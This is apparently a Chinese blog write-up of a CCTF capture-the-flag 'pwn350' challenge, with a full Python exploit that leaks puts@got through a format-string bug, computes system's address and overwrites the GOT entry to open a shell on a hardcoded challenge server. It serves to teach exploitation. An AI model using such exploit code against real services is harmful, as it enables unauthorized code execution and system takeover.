0x00:

之前打了CCTF,在CCTF的过程中遇到一个比较有意思的思路,记录一下。

0x01:

可以看到,这是一个 fmt 的漏洞,不过很简单,接收的输入都在stack中,可以确定输入在栈中的位置,可以做到 任意地址读写。

一般来说,对于这种类型的漏洞,写shellcode到合适的地址然后跳转过去,或者leaksystem地址,改其他函数的got,都是可以拿一个shell的。

本来,我的思路很窄,想的是构造一个循环,去leak我需要的函数,然后改got去拿shell

之后joker师傅提点了我一下,可以leak任意两个函数地址,然后去 libcdb.com 查一波libc的版本,就可以确定libc版本,从而得到system的偏移。

0x02:

综上利用思路就是,leak出任意两个函数地址,然后确定system()的偏移,改掉puts@got,构造puts调用的参数为/bin/sh 就可以拿到shell啦。

这是我找libc的时候截图

0x03:

from zio import *

#target = './pwn3'

target = ('120.27.155.82',9000)

r_m = COLORED(RAW, "green")

w_m = COLORED(RAW, "red")

pwd = "rxraclhm"

def put_file(name,content):

	io.read_until('ftp>')

	io.writeline("put")

	io.read_until("upload:")

	io.writeline(name)

	io.read_until("content:")

	io.writeline(content)

def get_file(name):

	io.read_until('ftp>')

	io.writeline("get")

	io.read_until('get:')

	io.writeline(name)

def get_file2(name):

	io.writeline("get")

	io.read_until('get:')

	io.writeline(name)

def put_file2(name,content):

	io.writeline("put")

	io.read_until("upload:")

	io.writeline(name)

	io.read_until("content:")

	io.writeline(content)

pl1 = l32(0x0804A014) #printf@got

pl1 += ",%7$s,"

pl2 = l32(0x0804A024) #malloc@got

pl2 += ",%7$s,"

pl3 = l32(0x0804A028) #puts@got

pl3 += ",%7$s,"

offset_puts_to_system = 0x00065650 - 0x00040190

#offset_puts_to_system = 0x269a0    # local 

io = zio(target,print_read=r_m,print_write=w_m,timeout=999)

io.read_until('):')

io.writeline(pwd)

put_file("a",pl3)

#raw_input('$$$$')

get_file("a")

rec = io.read_until('>').strip()

junk1,addr,junk2 = rec.split(',')

print "[*]puts is at:%s" % (addr[0:4][::-1] or '').encode('hex')

addr = addr[0:4][::-1].encode('hex')

system_addr = hex(int(addr,16) - offset_puts_to_system)

puts_addr   = hex(int(addr,16))

print "[*]system is at:" + system_addr

x = int(addr,16) - offset_puts_to_system

#a,b,c,d = [(x >> i) & 0b11111111 for i in range(0, 25, 16)]

a,b = [(x >> i) & 0b1111111111111111 for i in range(0, 25, 16)]

print hex(a)+","+hex(b)

put_file2("c",l32(0x0804A028)+"%%%dc"%(a-4)+"%7$hn")

raw_input('$$$')

get_file("c")

put_file2("d",l32(0x0804A028+2)+"%%%dc"%(b-4)+"%7$hn")

get_file("d")

put_file2("/bin/sh;","test")

io.writeline('dir')

io.interact()

0x04:

get shell

[CCTF] pwn350的更多相关文章

  1. CCTF部分赛题分析

    这次算是跟着师傅们全程打完了CCTF的线上赛,一些强队的WriteUp也放了出来.这篇文章主要是想跟着大牛的思路把那些题重新再过一遍. PWN3 这个是格式化字符串漏洞的题.printf的格式化串直接 ...

  2. Java基础语法

    java基础学习总结——基础语法1 一.标识符

  3. java基础学习总结——基础语法1

    一.标识符

  4. java 基础语法 1

    一.标识符 二.关键字 三.JAVA基础数据类型 3.1. java常量 3.2. java变量 从本质上来讲,变量其实是内存里面的一小块区域,一个程序在运行的时候,实际上这个程序是位于内存里面,然后 ...

  5. 做ctf题对malloc的疑问

    做cctf pwn printf题目的时候 疑问为什么dir函数会将之前out的name倒叙输出 调试了一下发现当malloc(0xf4)大小时候,例如 第一次分配0x1000的地址,将名字输入到0x ...

  6. Sql Server约束的学习二(检查约束、默认约束、禁用约束)

    接上一篇的Sql Server约束学习一(主键约束.外键约束.唯一约束) 4.检查约束 1)检查约束的定义 检查约束可以和一个列关联,也可以和一个表关联,因为它们可以检查一个列的值相对于另一个列的值, ...

  7. BugKu 杂项-这么多数据包

    前边的都是些无关紧要,只要有点网络的基础我想应该都能懂,往下看,一直到NO104,这是在干什么? 源ip138一直向目标ip159发送syn握手包,想要建立连接,其实就是端口扫描,原理就是,想和你某个 ...

  8. java基础—基础语法1

    一.标识符

  9. IDA动态调试技术及Dump内存

    IDA动态调试技术及Dump内存 来源 https://blog.csdn.net/u010019468/article/details/78491815 最近研究SO文件调试和dump内存时,为了完 ...

随机推荐

  1. 从入门到自闭之Python--MySQL数据库的单表操作

    单表查询:select * from 表 where 条件 group by 分组 having 过滤 order by 排序 limit n; 语法: select distinct 字段1,字段2 ...

  2. Python面试常考点之深入浅出链表操作

    Python面试常考点之深入浅出链表操作 在Python开发的面试中,我们经常会遇到关于链表操作的问题.链表作为一个非常经典的无序列表结构,也是一个开发工程师必须掌握的数据结构之一.在本文中,我将针对 ...

  3. Jmeter之Plugin插件,服务器监控

    Jmeter Plugins插件 我在测试工作中:主要使用了监听器中的图表报告和监控服务器CPU,内存(这篇博文就是对插件的安装,以及jmeter怎么监控服务器CPU~) 1.下载安装Plugins插 ...

  4. 向量运算(lua,三维) 点乘、叉乘、模、夹角

    向量运算在游戏制作中经常用到,稍微总结一下. 一.点乘 如图,假设   向量a与b的点乘表示a在b上的投影与b的模的乘积 公式: 代码: function MathHelper.GetVector3D ...

  5. nofollow标签浪费了多少站长做外链的时间

    对于rel=“external nofollow”和rel=“nofollow”,这两句代码,使用起来效果基本是一致的,只是前者较后者更为规范一点,两者翻译过来的意思就是:rel=“external ...

  6. curl 的使用

    curl 的使用 作者:与蟒唯舞链接:https://www.jianshu.com/p/f05bbd5007d9 curl 是一种命令行工具,作用是发出网络请求,然后获取数据,显示在"标准 ...

  7. [转载]为什么用Java开发桌面程序的比较少

    这个是本人这几天用javafx开发桌面程序时候想到的,因为虽然javafx比C#之类的确实坑多不少,但是习惯了之后也还行,而且它的一次编译.各处使用真的深得我心.但为什么不流行呢: 作者:bell 来 ...

  8. React学习——子组件给父组件传值

    //子组件 var Child = React.createClass({ render: function(){ return ( <div> 请输入邮箱:<input onCha ...

  9. GitLab 部署及管理员账号初始化

    Linux系统搭建GitLab---阿里云Centos7搭建Gitlab踩坑一.简介GitLab,是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的Git项目仓库,可通过We ...

  10. 【1】Zookeeper概述

    一.前言 在"网络是不可靠的"这一前提下,分布式系统开发需要解决如下四个问题: 客户端如何访问众多服务?  解决方案:服务聚合,使用API网关 服务于服务之间如何通信?  解决方案 ...